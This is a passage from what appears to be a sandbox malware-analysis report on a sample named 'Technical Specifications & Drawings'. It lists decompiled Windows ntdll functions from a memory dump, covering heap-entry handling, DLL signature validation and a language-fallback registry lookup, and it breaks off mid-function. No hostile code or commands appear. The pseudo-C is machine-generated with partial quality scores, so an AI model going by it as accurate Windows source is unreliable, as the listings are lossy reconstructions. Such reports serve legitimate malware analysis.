                                                  • Instruction Fuzzy Hash: AA81F372600688EFE726CBACC898BA9FBF8FF04714F0445A5E541C7296D774EA80CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CB73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E017CB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0186A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1898748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E017AB150();
					__eflags =  *0x1897bc8;
					if(__eflags == 0) {
						E01862073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0186A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1898720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1898720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E017CB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0186A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E017CE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                  0x017cb746
                                                  0x017cb74b
                                                  0x017cb74d
                                                  0x017cb750
                                                  0x017cb755
                                                  0x017cb758
                                                  0x017cb758
                                                  0x017cb75e
                                                  0x017cb763
                                                  0x017cb764
                                                  0x017cb76a
                                                  0x017cb76d
                                                  0x017cb771
                                                  0x017cb776
                                                  0x017cb85c
                                                  0x017cb85d
                                                  0x017cb860
                                                  0x017cb865
                                                  0x01812ba1
                                                  0x01812ba2
                                                  0x01812ba9
                                                  0x01812bae
                                                  0x01812bae
                                                  0x017cb77c
                                                  0x017cb77c
                                                  0x017cb77c
                                                  0x017cb785
                                                  0x017cb788
                                                  0x01812bb6
                                                  0x01812bb9
                                                  0x00000000
                                                  0x00000000
                                                  0x01812bbf
                                                  0x01812bc5
                                                  0x01812bc9
                                                  0x01812be8
                                                  0x01812bed
                                                  0x01812bcb
                                                  0x01812be0
                                                  0x01812be5
                                                  0x01812bf3
                                                  0x01812bf8
                                                  0x01812bfd
                                                  0x01812c05
                                                  0x01812c0e
                                                  0x01812c0e
                                                  0x00000000
                                                  0x017cb78e
                                                  0x017cb78e
                                                  0x017cb78e
                                                  0x017cb791
                                                  0x017cb791
                                                  0x017cb797
                                                  0x017cb797
                                                  0x017cb79f
                                                  0x017cb7a9
                                                  0x017cb7af
                                                  0x017cb7af
                                                  0x017cb7b1
                                                  0x017cb7b6
                                                  0x017cb7e2
                                                  0x017cb7e2
                                                  0x017cb7e7
                                                  0x017cb880
                                                  0x017cb7ed
                                                  0x017cb7ed
                                                  0x017cb7ed
                                                  0x017cb7ef
                                                  0x017cb7f2
                                                  0x017cb7f2
                                                  0x017cb7f5
                                                  0x017cb7fa
                                                  0x01812c2d
                                                  0x01812c2e
                                                  0x01812c39
                                                  0x017cb800
                                                  0x017cb800
                                                  0x017cb802
                                                  0x017cb805
                                                  0x017cb808
                                                  0x017cb808
                                                  0x017cb80a
                                                  0x017cb80d
                                                  0x017cb816
                                                  0x017cb81c
                                                  0x017cb822
                                                  0x017cb82f
                                                  0x017cb88b
                                                  0x017cb892
                                                  0x017cb897
                                                  0x017cb899
                                                  0x017cb89b
                                                  0x017cb89e
                                                  0x017cb8a5
                                                  0x017cb8a8
                                                  0x017cb8aa
                                                  0x017cb8ac
                                                  0x017cb8ac
                                                  0x017cb8aa
                                                  0x017cb892
                                                  0x017cb831
                                                  0x017cb839
                                                  0x017cb83b
                                                  0x017cb83b
                                                  0x017cb844
                                                  0x017cb84b
                                                  0x017cb852
                                                  0x017cb7b8
                                                  0x017cb7ba
                                                  0x017cb7bf
                                                  0x017cb7c4
                                                  0x01812c18
                                                  0x01812c19
                                                  0x01812c23
                                                  0x017cb7ca
                                                  0x017cb7ca
                                                  0x017cb7cc
                                                  0x017cb7cf
                                                  0x017cb7d1
                                                  0x017cb7d1
                                                  0x017cb7d4
                                                  0x017cb7dc
                                                  0x017cb8bb
                                                  0x017cb8bb
                                                  0x017cb8be
                                                  0x017cb8be
                                                  0x017cb8c1
                                                  0x00000000
                                                  0x00000000
                                                  0x017cb8c3
                                                  0x017cb8c5
                                                  0x017cb8c7
                                                  0x017cb8e0
                                                  0x00000000
                                                  0x017cb8e0
                                                  0x017cb8cc
                                                  0x017cb8cc
                                                  0x00000000
                                                  0x017cb8cc
                                                  0x017cb8d6
                                                  0x017cb8d6
                                                  0x00000000
                                                  0x017cb7dc
                                                  0x017cb7b6

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-1334570610
                                                  • Opcode ID: d2499cc7362a29f7d634c61217d4b048bf201b9f2848feadcaa867dbf05dd966
                                                  • Instruction ID: b9845505aaaabc7d1dfc399e68a980511b77c4908204aa2ad42fb5752836664f
                                                  • Opcode Fuzzy Hash: d2499cc7362a29f7d634c61217d4b048bf201b9f2848feadcaa867dbf05dd966
                                                  • Instruction Fuzzy Hash: 1861CF71640241DFDB29DF28C486B6AFBE5FF44B44F1885AEF8498B246D730E981CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017B7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E017B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E017BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E017AC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1895780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01825510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1895780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E017C7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017C7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01827016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E017C7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017C7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01827016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E017DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E017AB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                  0x017b7e4c
                                                  0x017b7e50
                                                  0x017b7e55
                                                  0x017b7e58
                                                  0x017b7e5d
                                                  0x017b7e71
                                                  0x017b7f33
                                                  0x017b7e77
                                                  0x017b7e77
                                                  0x017b7e79
                                                  0x017b7e79
                                                  0x017b7e7e
                                                  0x017b7f45
                                                  0x01809848
                                                  0x00000000
                                                  0x01809848
                                                  0x017b7f4e
                                                  0x017b7f53
                                                  0x017b7f5a
                                                  0x00000000
                                                  0x00000000
                                                  0x0180985a
                                                  0x01809862
                                                  0x01809866
                                                  0x00000000
                                                  0x0180986c
                                                  0x00000000
                                                  0x0180986c
                                                  0x017b7e84
                                                  0x017b7e84
                                                  0x017b7e8d
                                                  0x01809871
                                                  0x017b7eb8
                                                  0x017b7ec0
                                                  0x017b7ec0
                                                  0x017b7e9a
                                                  0x0180987e
                                                  0x00000000
                                                  0x00000000
                                                  0x01809884
                                                  0x0180988b
                                                  0x018098a7
                                                  0x018098ac
                                                  0x018098b1
                                                  0x018098b6
                                                  0x018098b8
                                                  0x018098b8
                                                  0x018098b9
                                                  0x00000000
                                                  0x018098b9
                                                  0x017b7ea0
                                                  0x017b7ea7
                                                  0x00000000
                                                  0x00000000
                                                  0x017b7eac
                                                  0x017b7eb1
                                                  0x017b7ec6
                                                  0x017b7ed0
                                                  0x018098cc
                                                  0x017b7ed6
                                                  0x017b7ed6
                                                  0x017b7ed6
                                                  0x017b7ede
                                                  0x017b7ee3
                                                  0x018098e3
                                                  0x018098f0
                                                  0x01809902
                                                  0x018098f2
                                                  0x018098fb
                                                  0x018098fb
                                                  0x01809907
                                                  0x0180991d
                                                  0x0180991d
                                                  0x01809907
                                                  0x018098e3
                                                  0x017b7ef0
                                                  0x017b7f14
                                                  0x017b7f14
                                                  0x017b7f1e
                                                  0x01809946
                                                  0x017b7f24
                                                  0x017b7f24
                                                  0x017b7f24
                                                  0x017b7f2c
                                                  0x0180996a
                                                  0x01809975
                                                  0x01809975
                                                  0x0180997e
                                                  0x01809993
                                                  0x01809993
                                                  0x0180997e
                                                  0x00000000
                                                  0x017b7ef2
                                                  0x017b7efc
                                                  0x017b7f0a
                                                  0x017b7f0e
                                                  0x01809933
                                                  0x00000000
                                                  0x01809933
                                                  0x00000000
                                                  0x017b7f0e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017b7eb1

                                                  Strings
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 01809891
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 018098A2
                                                  • LdrpCompleteMapModule, xrefs: 01809898
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: 21221e73558f043fc1a61975e380086d9e0368fa8ab255208350f34e0824ff82
                                                  • Instruction ID: aee34e6c0e18deeae0fdf883fcad0d23d3041c7da1464c4abf79c4037decf711
                                                  • Opcode Fuzzy Hash: 21221e73558f043fc1a61975e380086d9e0368fa8ab255208350f34e0824ff82
                                                  • Instruction Fuzzy Hash: 2251F531A00745DBE72ACB5CC9C4BA9FBA4AF88714F040699E955DB7D2D734EE00C750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018523E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E018523E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x189874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x189874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E017FD4F0(_t83, 0x1786c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E017AB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1896378 = 1;
						asm("int3");
						 *0x1896378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                  0x018523e3
                                                  0x018523e8
                                                  0x018523eb
                                                  0x018523ee
                                                  0x018523f3
                                                  0x0185259b
                                                  0x0185259b
                                                  0x0185259d
                                                  0x018525a3
                                                  0x018525a3
                                                  0x018523fb
                                                  0x01852424
                                                  0x0185244f
                                                  0x01852460
                                                  0x01852451
                                                  0x01852451
                                                  0x01852456
                                                  0x01852458
                                                  0x01852458
                                                  0x0185245b
                                                  0x0185245b
                                                  0x01852426
                                                  0x01852431
                                                  0x01852436
                                                  0x01852443
                                                  0x01852438
                                                  0x01852438
                                                  0x01852438
                                                  0x01852445
                                                  0x01852445
                                                  0x01852463
                                                  0x01852469
                                                  0x0185246f
                                                  0x01852480
                                                  0x01852495
                                                  0x018524a1
                                                  0x018524ce
                                                  0x018524df
                                                  0x018524d0
                                                  0x018524d0
                                                  0x018524d5
                                                  0x018524d7
                                                  0x018524d7
                                                  0x018524da
                                                  0x018524da
                                                  0x018524a3
                                                  0x018524b0
                                                  0x018524b5
                                                  0x018524c2
                                                  0x018524b7
                                                  0x018524b7
                                                  0x018524b7
                                                  0x018524c4
                                                  0x018524c4
                                                  0x018524e8
                                                  0x01852497
                                                  0x0185249a
                                                  0x0185249a
                                                  0x01852482
                                                  0x01852488
                                                  0x01852488
                                                  0x01852471
                                                  0x01852479
                                                  0x01852479
                                                  0x018524ef
                                                  0x018523fd
                                                  0x01852401
                                                  0x01852412
                                                  0x01852403
                                                  0x01852403
                                                  0x01852408
                                                  0x0185240a
                                                  0x0185240a
                                                  0x0185240d
                                                  0x0185240d
                                                  0x0185241b
                                                  0x0185241b
                                                  0x018524f1
                                                  0x018524f6
                                                  0x01852507
                                                  0x01852510
                                                  0x00000000
                                                  0x01852510
                                                  0x0185250b
                                                  0x00000000
                                                  0x018524f8
                                                  0x018524f8
                                                  0x018524fc
                                                  0x01852500
                                                  0x01852512
                                                  0x01852515
                                                  0x0185251a
                                                  0x01852521
                                                  0x01852524
                                                  0x01852529
                                                  0x0185252f
                                                  0x00000000
                                                  0x00000000
                                                  0x0185253c
                                                  0x0185255c
                                                  0x01852561
                                                  0x0185253e
                                                  0x01852554
                                                  0x01852559
                                                  0x0185256a
                                                  0x0185256d
                                                  0x01852574
                                                  0x01852586
                                                  0x01852588
                                                  0x0185258f
                                                  0x01852590
                                                  0x01852590
                                                  0x01852597
                                                  0x00000000
                                                  0x01852597

                                                  Strings
                                                  • HEAP: , xrefs: 0185255C
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0185256F
                                                  • HEAP[%wZ]: , xrefs: 0185254F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  • Opcode ID: 01c225d1d02f83481cbb088c9c7d062f955c3290cd5a3bb413984cebb20202aa
                                                  • Instruction ID: 7573d19a88452ba79bad3c020f2514a73c1d5a103836779f716fd4f21f84a852
                                                  • Opcode Fuzzy Hash: 01c225d1d02f83481cbb088c9c7d062f955c3290cd5a3bb413984cebb20202aa
                                                  • Instruction Fuzzy Hash: 8551F335100254CAE7F4CA2EC894772BFF3EB44748F544899EDC2CB285DA35EA46DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017AE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E017AE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E017AF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E017E95D0();
						}
						if(_t78 != 0) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E017EFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E017EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E017E9600();
					if(_t97 < 0) {
						goto L6;
					}
					E017EBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L017AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E017EBB40(_t83, _t102 + 0x24, _t78);
								if(L017B43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E017EBB40(_t84, _t102 + 0x24, _t94);
									if(L017B43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
